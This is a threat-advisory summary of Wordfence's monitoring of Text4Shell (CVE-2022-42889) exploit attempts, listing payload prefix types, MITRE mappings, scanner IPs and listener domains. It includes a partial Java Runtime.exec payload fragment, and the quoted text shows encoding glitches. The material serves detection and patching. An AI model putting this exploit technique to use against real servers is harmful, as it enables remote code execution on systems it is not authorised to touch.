Threat Research

Threat Advisory: Monitoring CVE-2022-42889 “Text4Shell” Exploit Attempts

Securonix

Wordfence Threat Intelligence monitored exploit attempts targeting CVE-2022-42889, aka Text4Shell, across millions of sites and observed payloads in DNS, script, and URL prefixes aimed at remote code execution. Most activity leverages DNS prefix probes to contact attacker-controlled listener domains, with some payloads designed to trigger actual code execution via script payloads and listener callbacks.
#Text4Shell #CVE-2022-42889 #ApacheCommonsText #Interactsh #Canarytokens #Wordfence

Keypoints

  • Text4Shell is a remote code execution vulnerability in Apache Commons Text versions 1.5–1.9; it was patched in 1.10.0.
  • Wordfence began monitoring for CVE-2022-42889 activity on Oct 18, 2022 across a network of about 4 million websites.
  • The majority of observed payloads appear in DNS prefix form and are used to scan for vulnerable installations; a successful attempt would cause the victim site to query attacker-controlled domains.
  • Script prefix payloads can execute code (e.g., using Java code) to perform actions like contacting a listener or running commands.
  • DNS, script, and URL prefixes each have different roles, with DNS being the most common probe method and URL prefix being the least common.
  • Tracked indicators include a long list of IPs and numerous listener domains (e.g., tress.cf, oast.online, canarytokens.com), indicating broad scanning and potential C2 callbacks.
  • Wordfence Intelligence IP Threat Feed updates hourly with new observed RCE activity related to this CVE; Ramuel Gall authored the article.

MITRE Techniques

  • [T1203] Exploitation for Client Execution – Remote code execution enabled by Text4Shell; β€˜Text4Shell is a vulnerability in the Apache Commons Text library versions 1.5 through 1.9 that can be used to achieve remote code execution.’
  • [T1071.004] Application Layer Protocol: DNS – DNS prefix payloads cause the victim to contact attacker-controlled listener domains; β€˜The vast majority of requests we are seeing are using the DNS prefix … a successful attempt would result in the victim site making a DNS query to the attacker-controlled listener domain.’
  • [T1059.007] Java – Script payloads invoke Java code to run commands; β€˜β€¦java.lang.Runtime.getRuntime().exec(…)’ (as shown in the payload example)

Indicators of Compromise

  • [IP Address] IP addresses observed sending requests targeting the vulnerability – 103.127.158.166*, 13.53.121.211*, and many more (see full list in article).
  • [Domain] Attacker-controlled listener and related domains – tress.cf, oast.online, oast.site, canarytokens.com, and other listed listeners (e.g., oast.live, oast.me).

Read more: https://www.wordfence.com/blog/2022/10/threat-advisory-monitoring-cve-2022-42889-text4shell-exploit-attempts/